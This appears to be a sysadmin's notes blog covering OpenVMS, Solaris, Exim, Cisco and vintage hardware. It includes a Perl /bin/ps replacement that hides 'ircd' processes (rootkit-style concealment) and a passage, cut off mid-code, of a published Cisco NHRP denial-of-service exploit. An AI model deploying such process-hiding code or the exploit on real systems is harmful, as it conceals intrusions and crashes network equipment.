…Details…

Icon

Thoughts that's escape, only details.

Feb 24, 2010 at 5:35 pm 0

OpenVMS – Command line editing

DCL implements command line editing and recall, so that users can more easily correct typing errors and reuse previous command lines.

Recall buffer: access to recently issued commands

$ RECALL string Bring up last command beginning with string.
$ RECALL/ALL Displays all commands and their numbers.
$ RECALL number Use a number found in RECALL/ALL.

Command line editing (if it isn’t on, do: $ SET TERM/LINE):

$ {up-arrow} Previous command in recall buffer.
$ {down-arrow} Next command in recall buffer.
$ {Ctrl A} Toggle insert/overstrike editing.
$ {Ctrl D} Move one character left.
$ {Ctrl E} Move to the end of the line.
$ {Ctrl F} Move one character right.
$ {Ctrl H} Move to the beginning of the line.
$ {Ctrl J} Delete word left of cursor.
$ {Ctrl R} Rewrite the command line.
$ {Ctrl U} Delete line left of cursor.
$ {Ctrl X} Cancel the current command line.

Miscellaneous:

$ {Ctrl 3} ASCII code for {Esc}.
$ {Ctrl I} ASCII code for {Tab}.
$ {Ctrl Z} Tell DCL "end of file". Used in some programs
to indicate more general sorts of "end" commands.

Of these, only {Ctrl I} will insert a character into the command line,
rather than just move the cursor around. No new characters may be
inserted before a tab ({Ctrl I}) in a command line, but existing characters
may be changed in overstrike mode, or deleted. This behavior is documented in the “I/O User’s Guide” and has existed since VMS 4.0.

Feb 19, 2010 at 2:56 pm 0

MSTSC – Admin session

Memo per il Giaco:

Syntax
MSTSC option
MSTSC /Edit"ConnectionFile"
MSTSC /migrate

Options
ConnectionFile The name of an RDP file for connection

/v: The remote computer to connect to

/console Connect to the console of a server (NT/XP)
/Admin Connect to a session for administering the server(Vista/2008)

/f Start in Full Screen mode

/w:width Width of the RDP screen
/h:height Height of the RDP screen

/span Match the Remote Desktop width and height with the local virtual
desktop, spanning across multiple monitors if necessary.(Vista/2008)

/public Run Remote Desktop in public mode. (Vista/2008)
In public mode, passwords and bitmaps are not cached.

/edit Open the RDP file for editing.
/migrate Convert a legacy Client connection file into an .RDP file

Feb 17, 2010 at 2:10 pm 0

Exim – Spool destroyer

In case of massive spam attack.

#!/bin/bash
ls /var/spool/exim/input/ > /tmp/delspoorexim
declare -a ARRAY
exec 10< /tmp/delspoorexim
let count=0
while read dels <&10; do
rm -fr /var/spool/exim/input/$dels
echo $dels
ARRAY[$count]=$dels
((count++))
done
echo Number operation done: ${#ARRAY[@]}
#echo ${ARRAY[@]}
exec 10>&-
rm /tmp/delspoorexim

Feb 11, 2010 at 10:41 am 1

OpenVMS – SYS$BATCH Queue

Little memo about sys$batch queue:

If no queue manger set:

$ DEFINE/SYSTEM/EXECUTIVE_MODE QMAN$MASTER DKA100:[QUEMAN]
$ START/QUEUE/MANAGER DKA100:[SYSQUE]

Problem:

$ SHOW QUEUE SYS$BATCH
%JBC-E-NOSUCHQUE, no such queue

Resolution:

$ INIT/QUE/BATCH SYS$BATCH

Problem:

$ SHOW QUEUE SYS$BATCH
%JBC-E-JOBQUEDIS, system job queue manager is not running

Resolution:

$ START/QUE SYS$BATCH

Full Reset:

$ STOP/QUE SYS$BATCH
$ DELETE/QUE SYS$BATCH
$ INIT/QUE/BATCH SYS$BATCH

More info:
OpenVMS System Manager’s Manual
Chapter 13
Managing the Queue Manager and Queue Database

Feb 11, 2010 at 9:38 am 1

Solaris – Add swap to ZFS disk

I installed Solaris 10 05/09 on a machine and I used whatever the default swap space setting when I built the box. Now I need to increase the swap space and I can’t add a swap file, like was possible under UFS.

If your swap device is in use, then you might not be able to delete it. Check to see if the swap area is in use. For example:


$ swap -l
swapfile dev swaplo blocks free
/dev/zvol/dsk/rpool/swap 182,2 8 4194296 4194296

In the above output, blocks == free, so the swap device is not actually being used.

If the swap area is not is use, remove the swap area. For example:

$ swap -d /dev/zvol/dsk/rpool/swap

Confirm that the swap area is removed.


$ swap -l

No swap devices configured

Resize the swap volume. For example:


$ zfs set volsize=1G rpool/swap

Activate the swap area.


$ swap -a /dev/zvol/dsk/rpool/swap


$ swap -l
swapfile dev swaplo blocks free
/dev/zvol/dsk/rpool/swap 182,2 8 2097144 2097144

Feb 11, 2010 at 9:16 am 0

DEC 3000 Alpha – Firmware Upgrade


>>> boot esa0
INIT-S-CPU...
INIT-S-ASIC...
INIT-S-MEM...
INIT-S-NVR...
INIT-S-CXT...
INIT-S-SCC...
INIT-S-NI...
INIT-S-SCSI...
INIT-S-ISDN...
AUDIT_BOOT_STARTS ...
AUDIT_BOOT_REQ
AUDIT_BOOT_RETRY
AUDIT_BOOT_RETRY
AUDIT_BOOT_RETRY
AUDIT_BOOT_RETRY
AUDIT_BSERVER_FOUND
AUDIT_LOAD_BEGINS
AUDIT_LOAD_DONE
*** FIRMWARE UPDATE UTILITY V2.6a ***
*** SYSTEM TYPE: M300 ***
UPDATE
VERIFY
LIST
SHOW
?
UPD-> update
Read IO ROM Device ID
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
Read System ROM Device ID
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
UPDATE SYSTEM ROM DEVICE
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
FIRMWARE REVISION: V7.0 LENGTH: 0x352e4 -> 217828 BYTES CHECKSUM: 0x1c
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
UPD-I *** ROM CONTENTS WILL BE DESTROYED ***
UPD-I ARE YOU READY TO PROGRAM DEVICE ? (Y/N ) y
UPD-I PRECHARGING DEVICE
................................................................
UPD-I ERASING ROM DEVICE
................................................................
UPD-I PROGRAMMING DEVICE
.....................................................
UPD-I PROGRAMMING COMPLETED
...........................
SYSTEM ROM UPDATE SUCCESSFUL
UPDATE IO ROM DEVICE
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
FIRMWARE REVISION: V7.0 LENGTH: 0x34da8 -> 216488 BYTES CHECKSUM: 0x59
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
UPD-I PRECHARGING DEVICE
................................................................
UPD-I ERASING ROM DEVICE
................................................................
UPD-I PROGRAMMING DEVICE
....................................................
UPD-I PROGRAMMING COMPLETED
...........................
IO ROM UPDATE SUCCESSFUL
UPD->
UPD-> ?
UPDATE:
Update the ROMs. Jumpers MUST be installed on both roms.
For example
UPD->update

VERIFY [DEVICE]:
Verify the ROM[s]. If no qualifiers then all ROMS verified
The Checksum of file image is compared with rom image
For example
UPD->verify
UPD->verify system
UPD->verify io

SHOW [DEVICE]:
Show the current ROM Revision
For example
UPD->show
UPD->show system
UPD->show io

LIST :
List the supported ROM Devices
For example
UPD->list
*** ROM Devices Supported ***
SYSTEM: KN15-AA CPU Module 28F020 256Kx8 FLASH MEMORY
IO: IO-XXX I/O Module 28F020 256Kx8 FLASH MEMORY

*** FIRMWARE UPDATE UTILITY V2.6a ***
*** SYSTEM TYPE: M300 ***
UPDATE
VERIFY
LIST
SHOW
?
UPD->

Jan 17, 2010 at 7:55 am 0

Vodafone ITA – Call Forwarding

If your phone (example iPhone) doesn’t have complete call forwarding menu, you can use line code, then, to activate and deactivate Call Forwarding, follow this instructions:

Call Forward Immediate – Send all calls to another number instantly.
enable: **21* (prefix + number) # call
disable: ## 21 # call
verify: * # 21 # call

Call Forward No Reply – Send calls that go unanswered.
enable: **61* (prefix + number) # call
disable: ## 61 # call
verify: * # 61 # call

Call Forward Not Reachable conditions – Send calls elsewhere if your phone is off or not in the service area.
enable: **62* (prefix + number) # call
disable: ## 62 # call
verify: * # 62 # call

Call Forward Busy – Send calls that reach a busy signal to another number.
enable: **67* (prefix + number) # call
disable: ## 67 # call
verify: * # 67 # call

To forward call to the operator Voice Mail use: international prefix + your three digit prefix + 20

Jan 16, 2010 at 10:57 pm 0

Securing “tmp” without repartition

1. First you should secure /tmp:

Make a 1GB file for /tmp parition and an ext3 filesystem for tmp:


# dd if=/dev/zero of=/dev/tmpFS bs=1024 count=1000000
# /sbin/mkfs.ext3 /dev/tmpFS

Create a backup copy of your current /tmp drive:


# cp -Rpf /tmp /tmpbackup

Mount our new tmp parition and change permissions:


# mount -o loop,noexec,nosuid,rw /dev/tmpFS /tmp
# chmod 1777 /tmp

Copy the old data:
cp -Rpf /tmpbackup/* /tmp/

If you run the mount command and you should get something like this:
/dev/tmpMnt on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)

Edit /etc/fstab and add this:

/dev/tmpMnt /tmp ext3 loop,nosuid,noexec,rw 0 0

Test your fstab entry:


# mount -o remount /tmp

You can test it runnig a script on /tmp partition, if you get “permission denied” it is fine :)

2. Secure /var/tmp:

It should be done because some applications use /var/tmp as the temporary folder, and anything that’s accessible by all, needs to be secured.

Rename it and create a symbolic link to /tmp:


# mv /var/tmp /var/tmp1
# ln -s /tmp /var/tmp

Copy the old data back:


# cp /var/tmpold/* /tmp/

Note: you should restart and services that uses /tmp partition

Jan 16, 2010 at 10:54 pm 0

Debian NetInstall – Sparc

Per prima cosa è necessario avere un host linux nel mio caso Debian, e poi ovviamente una Sparc :)

Sull’host linux è necessario avere un server rarp e tftp quindi installiamo in questo modo:


vm01:~# apt-get install rarpd tftpd-hpa

Configuriamo rarpd, editando il seguente file /etc/ethers inserendo una riga con mac address della sparc (si può vedere appena accesa da OpenBoot):


XX:XX:XX:XX:XX:XX 192.168.xx.xx


Riavviamo per applicare le modifiche:

vm01:~# /etc/init.d/rarpd restart

OpenBoot all’avvio una volta ricevuto l’ip cercherà l’immagine nel tftp on notazione decimale, ammettendo che l’ip sia 192.168.101.9 effettuiamo la conversione in questo modo:

vm01:~# printf "%.2X%.2X%.2X%.2X\n" 192 168 101 9
C0A86509

Scarichiamo quindi l’immagine di netinstall di debian, e creiamo un link simbolico con la notazione decimale:


vm01:~# cd /var/lib/tftpboot
vm01:~# wget ftp://ftp.debian.org/debian/dists/stable/main/installer-sparc/current/images/netboot/boot.img
vm01:~# ln -s boot.img C0A86509

Successivamente da Sparc all’avvio, premere Stop-A o Break per mostrare il prompt di OpenBoot (“ok “) e digitare


boot net

Dec 2, 2009 at 7:28 am 0

Securing /dev/shm

Edit your /etc/fstab:

# vi /etc/fstab

change:

none /dev/shm tmpfs defaults,rw 0 0

to

none /dev/shm tmpfs defaults,nosuid,noexec,rw 0 0

Remount /dev/shm:

# mount -o remount /dev/shm

You can test it runnig a script on /dev/shm, if you get “permission denied” it is fine!

Dec 2, 2009 at 7:19 am 0

ProFTP(D) – listen on single ip

I don’t use ftp, but wordpress comes with this nice feature to upgrade plugins automatically from the web admin interface that needs ftp.

the problem is I don’t want to enable the ftp service and make it available to the rest of the world just for that.

So I needs the following two options in proftpd.conf:

DefaultAddress 127.0.0.1
SocketBindTight on

Now restart proftpd and you’re done.

Dec 2, 2009 at 7:15 am 0

Iptables Flush

Full flush iptables script:

#!/bin/sh
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Dec 2, 2009 at 7:10 am 0

Bastard code. (1)


srv:/bin# cat ps
#!/usr/bin/perl
use warnings;
use strict;

my $string = $ARGV[0];
if($string){
my @net = qx/ps.old $string/;
my @hide = grep(!/(ircd)/, @net);
my @dd = grep(!/ps.old/, @hide);
print @dd;
}
else
{
my @nett = qx/ps.old/;
my @hidee = grep(!/(ircd)/, @nett);
my @d = grep(!/ps.old/, @hidee);
print @d;
}

Nov 29, 2009 at 1:45 am 0

VAX – MMJ DEC423 Pinout

Setting up serial connection to VAXstation 4000/60:

First made a serial cable, attention Vax use a DEC423 serial port designed for long distant terminal line:

--------------- 1 - DTR (Data terminal ready)
I             I 2 - TxD (Transmit data)
I 1 2 3 4 5 6 I 3 - GND (Signal ground)
I             I 4 - RxC (Receive common)
I             I 5 - RxD (Receive data)
---------I____I 6 - DSR (Data set ready)

Pin 2 of the phone connector goes to Rx pin of the serial (3 of DB25 or 2 of DB9), pins 3 & 4 go to ground (7 of DB25 or 5 of DB9), and pin 5 goes to Tx pin (2 of DB25 or 3 of DB9).

Then, make sure that the S3 switch (on the front of the 4000/60) is set to
the up position so that the VAX uses the serial console instead of the
graphics console.

Then, load up your favourite terminal application, set the speed to 9600
baud, make sure hardware handshaking is off, and see if you can talk to
the VAX.

Nov 27, 2009 at 3:03 am 0

My first VAX and VMS system

3 days ago I find a nice VAX Station 4000/60 on ebay for only 41 Euro (about 60 Dollars), obviously I bought it, and today delivery boy knock my door!

I paste the command/console output of the recovery procedure:

KA46-A V1.4-38E-V4.2
08-00-2B-92-4E-C7
24MB

?? 001 9 NI 0172

>>> sh config

KA46-A V1.4-38E-V4.2
08-00-2B-92-4E-C7
24MB

DEVNBR DEVNAM INFO
------ -------- --------------------------
1 NVR OK
2 LCG OK
HR - 8 PLN FB - V1.2
3 DZ OK
4 CACHE OK
5 MEM OK
24MB = SY=8MB, S0/1=8MB, S2/3=8MB, S4/5=0MB
6 FPU OK
7 IT OK
8 SYS OK
9 NI ?? 001 0172
10 SCSI OK
3-L0-RZ26B 6-INITR
11 AUD OK

>>> ?

BOOT [/[R5:]<bflg>] [<ddau>[:]]
CONTINUE
DEPOSIT [{ /B | /W | /L | /Q | /A }] [{ /P | /V | /I }] [/G] [/U] [/N:<n>]
[{ <addr> | <sym> | + | - | * | @ } [<datum>]]
EXAMINE [{ /B | /W | /L | /Q | /A }] [{ /P | /V | /I }] [/G] [/U] [/N:<n>]
[{ <addr> | <sym> | + | - | * | @ }]
FIND [{ /MEMORY | /RPB }]
HALT
HELP
INITIALIZE
LOGIN
REPEAT <cmd>
SET BOOT <ddau>
SET BFLG <bflg>
SET DIAGENV <1-3>
SET FBOOT <0-1>
SET HALT <1-3>
SET KBD <0-15>
SET MOP <0-1>
SET PSE <0-1>
SET PSWD
SET SCSI <0-7>
SET TRIG <0-1>
SHOW { BOOT | BFLG | CONFIG | DEV | DIAGENV | FBOOT | ETHER | ERROR |
ESTAT | HALT | KBD | MEM | MOP | PSE | SCSI | TRIG }
START <addr>
TEST [/UTIL] <devnam | devnbr>
UNJAM
X <addr> <cnt> ...
?

>>> B/1

-DKA300
SYSBOOT> SET/STARTUP OPA0:

SYSBOOT> SET WINDOWS_SYSTEM 0

%SYSBOOT-E-NOPARAM, no such parameter WINDOWS_SYSTEM
SYSBOOT> SET WRITESYSPARAMS 0

SYSBOOT> CONTINUE

VAX/VMS Version V5.5-2H4 Major version id = 1 Minor version id = 0

PLEASE ENTER DATE AND TIME (DD-MMM-YYYY HH:MM) 27-NOV-2009 3:51
$

$ SPAWN
SPAWN
%DCL-S-SPAWNED, process SYSTEM_1 spawned
%DCL-S-ATTACHED, terminal now attached to process SYSTEM_1
$ @SYS$SYSTEM:STARTUP
$! Copyright (c) 1993 Digital Equipment Corporation. All rights reserved.

%STDRV-I-STARTUP, VMS startup begun at 27-NOV-2009 04:00:59.19

The VAX/VMS system is now executing the system startup procedure.

%SET-I-NEWAUDSRV, identification of new audit server process is 00000088

The VAX/VMS system is now executing the site-specific startup commands.

%RUN-S-PROC_ID, identification of created process is 0000008C
%NCP-W-FILOPE, File open error , Permanent database

%NML-E-OPENOUT, error opening SYS$SYSROOT:[SYSEXE]NETLOGING.DAT; as output
-RMS-F-PLV, unsupported prolog version
%NCP-W-OPEFAI, Operation failure

%SYSTEM-F-TIMEOUT, device timeout
, timeout
, unit is active
, fatal hardware error
%NCP-W-UNRCMP, Unrecognized component , Circuit
Circuit = SVA-0

%NCP-I-NOINFO, No information in database
%RUN-S-PROC_ID, identification of created process is 0000008D
Job NCPSTART (queue SYS$BATCH, entry 1) started on SYS$BATCH
%RUN-S-PROC_ID, identification of created process is 0000008F
%SET-I-INTSET, login interactive limit = 20, current interactive value = 1
27-NOV-2009 04:03:07
Process SYSTEM_1 logged out at 27-NOV-2009 04:03:08.62

Accounting information:
Buffered I/O count: 3431 Peak working set size: 888
Direct I/O count: 1440 Peak page file size: 3806
Page faults: 16606 Mounted volumes: 0
Charged CPU time: 0 00:00:22.71 Elapsed time: 0 00:02:18.06
%DCL-S-RETURNED, control returned to process STARTUP
$ SET DEFAULT SYS$SYSTEM
SET DEFAULT SYS$SYSTEM
$ RUN SYS$SYSTEM:AUTHORIZE
RUN SYS$SYSTEM:AUTHORIZE
UAF> MODIFY SYSTEM /PASSWORD=system
%UAF-I-MDFYMSG, user record(s) updated
UAF> EXIT
%UAF-I-DONEMSG, system authorization file modified
%UAF-I-RDBNOMODS, no modifications made to rights data base
$ LOGOUT
LOGOUT
SYSTEM job terminated at 27-NOV-2009 04:04:26.81

Accounting information:
Buffered I/O count: 99 Peak working set size: 1056
Direct I/O count: 46 Peak page file size: 3978
Page faults: 471 Mounted volumes: 0
Charged CPU time: 0 00:00:00.41 Elapsed time: 0 00:05:33.58

Welcome to VAX/VMS V5.5-2H4

Username:

Nov 10, 2009 at 6:18 am 0

Asterisk – permissions and ownership for the socket console

If you need to give asterisk operational permission to a simple user on linux system, first of all you can add it on asterisk group, then you can edit “asterisk.conf” usually on /etc/asterisk/ and give rwx permission to asterisk group like this (add if they don’t exist):

[files]
astctlpermissions => 770
astctlowner => asterisk
astctlgroup => asterisk
astctl => /var/run/asterisk/asterisk.ctl

Restart asterisk to apply changes.

Common error (wrong socket permission):

[leo@srv01 ~]$ /usr/sbin/asterisk -r
Asterisk 1.4.22-4 RPM by vc-rpms@voipconsulting.nl, Copyright (C) 1999 - 2008 Digium, Inc. and others.
Created by Mark Spencer
Asterisk comes with ABSOLUTELY NO WARRANTY; type 'core show warranty' for details.
This is free software, with components licensed under the GNU General Public
License version 2 and other licenses; you are welcome to redistribute it under
certain conditions. Type 'core show license' for details.
=========================================================================
Unable to connect to remote asterisk (does /var/run/asterisk/asterisk.ctl exist?)
[leo@srv01 ~]$

Nov 10, 2009 at 6:00 am 0

Extract files from DEB package

Some day ago, I wrote about RPM extraction, today I need content of DEB packcage, on the contrary of rpm systems debian package manager allow to extract natively by this command:

#dpkg-deb -x somepackage.i386.deb

But my problem is different, I not using Debian sytem, fortunately DEB files are “ar” archives, which contain three files:
- debian-binary
- control.tar.gz
- data.tar.gz

first, extract “ar” archive with this simple command:

# ar vx somepackage.i386.deb

then extract the contents of data.tar.gz using tar:

# tar -xzvf data.tar.gz

Or, if you want, you can made in one step:

# ar p somepackage.i386.deb data.tar.gz | tar zx

Nov 3, 2009 at 4:44 am 0

Mac OS X – Time Machine network backup without Time Capsule

From OS X 10.5 (Leopard) Apple introduced Time Machine: a great combination of rsync/rsnapshot and a beautiful user interface.
Time Machine works in two modes: 1. local volume on local area or 2. Time Capsule over network.
Now I don’t wanna buy another box with apple logo over it for much $$$ when I have a lot of file servers on my network.

Now I explain a few hoops to get this system to work:

First: persuade Time Machine to see the SMB share as a Time Machine destination by activating the unsupported network drives feature by this console command:

# defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1

Second: set up the file server with SMB dedicated share to Time Machine, create an appropriate disk image locally (see below) and copy it into share.

To create the disk image, you’ll need to find out two pieces of information about the computer you want to backup: its Computer Name and its Ethernet ID (Ethernet MAC address). The Computer Name is the one that you set in the Sharing System Preferences pane. For example my is “LeoBook2″.

You can get the Ethernet ID by this command (use wired mac nic even if you’ll be using wifi connection):

# ifconfig en0 | grep ether | sed s/://g | sed s/ether//

Compose image name following this syntax:
Computer Name, followed by an underscore, followed by the Ethernet ID without the colons, followed by .sparsebundle (Ex. “LeoBook2_000d9358ca26.sparsebundle”).

Now go to Terminal and type the following commands:

# DISK_IMAGE_NAME="LeoBook2_000d9358ca26.sparsebundle"
# DISK_SIZE=200000
# hdiutil create -library SPUD -megabytes $DISK_SIZE -fs HFS+J -type SPARSEBUNDLE -volname "$DISK_IMAGE_NAME" "$DISK_IMAGE_NAME"

After you’ve run this command, you should end up with a disk image in your Home. It looks like a single file, but it’s actually a directory (just like a application). Don’t forget to copy this disk image to the appropriate share on your server. Just dragging and dropping from the Finder should work fine.

Now you are able to use the share as Time Machine backup volume.

Have a fun
Leo

Nov 2, 2009 at 4:58 am 0

Extract files from RPM package

There is no direct RPM option available via rpm command to extract an RPM file. But there is a small utility available called rpm2cpio. It Extract cpio archive from RPM Package Manager (RPM) package.
Example extract RPM file using rpm2cpio and cpio command:

# rpm2cpio somepackage.x86_64.rpm | cpio -idmv

Output of rpm2cpio piped to cpio command with following options:
i: Restore archive
d: Create leading directories where needed
m: Retain previous file modification times when creating files
v: Verbose

Oct 2, 2009 at 5:25 am 0

Sun Ultra10 – Crash/Recovery

Yesterday after 1 year and 2 month uptime, my poor Sun Ultra 10 (Solaris OS10) running into home server room, was crashed..

I’m so sick, here the paste of console recovery procedure:

Type  'go' to resume
ok ?
1000000
Stack Underflow
ok sync

panic[cpu0]/thread=2a100057ca0: sync initiated

sched: software trap 0x7f
pid=0, pc=0xf0050c7c, sp=0x2a100056e81, tstate=0x8800001401, context=0x0
g1-g7: 104da44, 0, 183f000, 0, 1082400, 5, 2a100057ca0

00000000fffa9d10 unix:sync_handler+138 (fffe5718, 1000000, 1, 1083400, 1, 181500                                             0)
  %l0-3: 00000000018621b0 0000000001862000 000000000000017f 0000000001845800
  %l4-7: 0000000000000000 000000000183f000 0000000000000009 0000000001810400
00000000fffa9de0 unix:vx_handler+80 (fffe5718, 181dfe8, f0000000, fffe0000, 181e                                             0f0, f003bda1)
  %l0-3: 000000000181e0f0 0000000000000000 0000000000000001 0000000000000001
  %l4-7: 0000000001810c00 00000000f0000000 0000000001000000 0000000001018998
00000000fffa9e90 unix:callback_handler+20 (fffe5718, 1, 0, 0, 0, 0)
  %l0-3: 0000000000000016 00000000fffa9741 00000000f004a64c 00000000fffe0000
  %l4-7: 0000000000000016 0000000000000000 0000000000000000 000000000180c000

syncing file systems... 3 done
dumping to /dev/dsk/c0t0d0s7, offset 107413504, content: kernel
100% done: 15712 pages dumped, compression ratio 2.54, dump succeeded
rebooting...
Resetting ...

Sun Ultra 5/10 UPA/PCI (UltraSPARC-IIi 440MHz), No Keyboard
OpenBoot 3.25, 512 MB (50 ns) memory installed, Serial #15184795.
Ethernet address 8:0:20:e7:b3:9b, Host ID: 80e7b39b.

Rebooting with command: boot
Boot device: /pci@1f,0/pci@1,1/ide@3/disk@0,0:a  File and args:
SunOS Release 5.10 Version Generic_137111-06 64-bit
Copyright 1983-2008 Sun Microsystems, Inc.  All rights reserved.
Use is subject to license terms.
Hostname: ultra10
Loading smf(5) service descriptions: 1/1
WARNING: svccfg import /var/svc/manifest/application/database/mysql.xml failed
svccfg import warnings. See /var/svc/log/system-manifest-import:default.log .
/dev/rdsk/c0t0d0s1 is clean

ultra10 console login: root
Password:
Sep 29 23:02:52 ultra10 login: ROOT LOGIN /dev/console
Last login: Tue Sep 29 22:21:42 from 192.168.2.15

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
root@ultra10 ~ #

Sep 17, 2009 at 2:49 pm 0

Cisco – ASA/PIX enable ASDM


fw01a> enable
Password:
fw01a# configure terminal
fw01a(Config)# interface ethernet1
fw01a(Config-if)# nameif inside
fw01a(Config-if)# ip address 192.168.1.1 255.255.255.0
fw01a(Config-if)# no shutdown
fw01a(Config-if)#

Activate ASDM and enable http server.


fw01a(Config)# asdm image flash:/asdm.bin.
fw01a(Config)# http server enable.

Open a connection for your inside network.


fw01a(Config)# http 192.168.1.0 255.255.255.0 inside

Make sure all your config running properly.


fw01a(Config)# show running http
http server enabled
http 192.168.1.0 255.255.255.0 inside
fw01a(Config)#

Now your Cisco ASA/PIX can be access from your PC, open your web browser then enter this address https://192.168.1.1/admin

Sep 16, 2009 at 2:30 am 0

Exim – Command

Some userfull Exim command:

exim -bp mailq — The mailq is relevant
as it gives your the email IDs.
exim -M emailID force delivery of one message
exim -qf Force another queue run
exim -qff Force another queue run and
attempt to flush frozen messages
exim -Mvl messageID View Log for message
exim -Mvb messageID View Body for message
exim -Mvh messageID View Header for message
exim -Mrm messageID ReMove message (no errors sent)
exim -Mg messageID Give up and fail message,
message bounces to sender

Sep 16, 2009 at 2:13 am 0

Watch – Exim Queue

Just in one line meno:

# watch -n 5 'exim -bp | exiqsumm |grep TOTAL'

Sep 16, 2009 at 1:54 am 0

Cisco DMVPN/NBMA – Security

I’m working on experimental wide lab network based on DMVPN/NBMA, with some friends, dynamic multipoing vpn is seem a great solution, looks like a cheap frame relay infrastructure over internet.

Now the problem: what about security?
especially in dynamical wan ip address envivorment durin spoke-spoke communication, is impossible define security rule on GRE level.

Solution:
I’m thinking about…

Only for testing purpose, I find this exploit:

[codesyntax lang="c"]
/******************************************************************************/
/* */
/* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de> */
/* */
/* Feel free to modify this code as you like, as long as you include the */
/* above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* Cisco bug ID: CSCin95836 */
/* */
/* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used */
/* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA) */
/* subnetwork to determine the internetworking layer address and NBMA */
/* subnetwork addresses of the NBMA next hop towards the destination. */
/* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */
/* IPSEC. */
/* */
/* URLs: */
/* - [RFC2332/NHRP] http://rfc.net/rfc2332.html */
/* - [RFC1701/GRE] http://rfc.net/rfc1701.html */
/* - [DMVPNs with Cisco] http://www.cisco.com/en/US/tech/tk583/tk372/techno */
/* logies_white_paper09186a008018983e.shtml */
/* */
/* This code was only tested on FreeBSD and Linux, no warranty is or will be */
/* provided. */
/* */
/* Vulnerable images (tested): */
/* */
/* - c7100-jk9o3s-mz.123-12e.bin */
/* - c7200-jk8o3s-mz.122-40.bin */
/* - c3640-js-mz.122-15.T17.bin */
/* (and many other IOS versions on different platforms) */
/* */
/* Vulnerable configuration on cisco IOS: */
/* */
/* interface Tunnel0 */
/* ip address 10.0.0.1 255.255.255.128 */
/* no ip redirects */
/* no ip proxy-arp */
/* ip mtu 1464 */
/* ip nhrp authentication mysecret */
/* ip nhrp network-id 1000 */
/* ip nhrp map multicast dynamic */
/* ip nhrp server-only */
/* ip nhrp holdtime 30 */
/* tunnel source FastEthernet0/0 */
/* tunnel mode gre multipoint */
/* tunnel key 123456789 */
/* */
/* This exploit works even if "ip nhrp authentication" is configured on the */
/* cisco router. You can also specify a GRE key (use 0 to disable this */
/* feature) if the GRE tunnel is protected. You don't need to know the */
/* NHRP network id (or any other configuration details, except the GRE key if */
/* it is set on the target router). */
/* */
/* NOTE: The exploit only seems to work, if a NHRP session between the target */
/* router and at least one client is established. */
/* */
/* Code injection is also possible (thanks to sky for pointing this out), but */
/* it is not very easy and depends heavily on the IOS version / platform. */
/* */
/* Example: */
/* root@elxsi# ./nhrp-dos vr0 x.x.x.x 123456789 */
/* */
/* Router console output: */
/* */
/* -Traceback= 605D89A0 605D6B50 605BD974 605C08CC 605C2598 605C27E8 */
/* $0 : 00000000, AT : 62530000, v0 : 62740000, v1 : 62740000 */
/* <snip> */
/* EPC : 605D89A0, ErrorEPC : BFC01654, SREG : 3400FF03 */
/* Cause 00000024 (Code 0x9): Breakpoint exception */
/* */
/* Writing crashinfo to bootflash:crashinfo_20070321-155011 */
/* === Flushing messages (16:50:12 CET Wed Mar 21 2007) === */
/* */
/* Router reboots or sometimes hangs ;) */
/* */
/* */
/* Workaround: Disable NHRP ;) */
/* */
/* I'd like to thank the Cisco PSIRT and Clay Seaman-Kossmey for their help */
/* regarding this issue. */
/* */
/* Greetings fly to: sky, chilli, arbon, ripp, huega, gh0st, argonius, s0uls, */
/* xhr, bullet, nanoc, spekul, kaner, d, slobo, conny, H-Ra */
/* and #infiniteVOID */
/* */
/******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>

/* BSD */
#define _BSD

/* Header sizes */
#define IP_HDR_SIZE 20
#define GRE_HDR_SIZE 4
#define GRE_KEY_SIZE 4
#define NHRP_HDR_SIZE 62

/* Function prototypes */
int open_socket (void);
int close_socket (int);
int send_dos(int, unsigned long, unsigned long, unsigned long);
unsigned long resolve_ip (char *);
unsigned long get_int_ipv4 (char *);

/* Globals */
int sockfd;
int nhrp_req_id;

/* GRE header */
struct gre_h {
unsigned short flags; /* GRE flags */
unsigned short ptype; /* GRE protocol type */
unsigned int key; /* GRE key */
};

/* NHRP header */
struct nhrp_h {
/* NHRP fixed header (20 bytes) */
struct {
unsigned short afn; /* NHRP AFN */
unsigned short proto; /* NHRP protocol type */
unsigned int snap; /* NHRP SNAP */
unsigned short snapE:8; /* NHRP SNAP */
unsigned short hops:8; /* NHRP hop count */
unsigned short length; /* NHRP total length */
unsigned short checksum; /* NHRP checksum */
unsigned short mpoa_ext; /* NHRP MPOA extensions */
unsigned short version:8; /* NHRP version */
unsigned short type:8; /* NHRP type */
unsigned short nbma_addr:8; /* NHRP t/l of NBMA address */
unsigned short nbma_sub:8; /* NHRP t/l of NBMA subaddr */
} fixed;

/* NHRP mandatory part */
struct {
unsigned short src_len:8; /* NHRP src protocol length */
unsigned short dst_len:8; /* NHRP dest protocol length */
unsigned short flags; /* NHRP flags */
unsigned int request_id; /* NHRP request ID */
unsigned long client_nbma; /* NHRP client NBMA address */
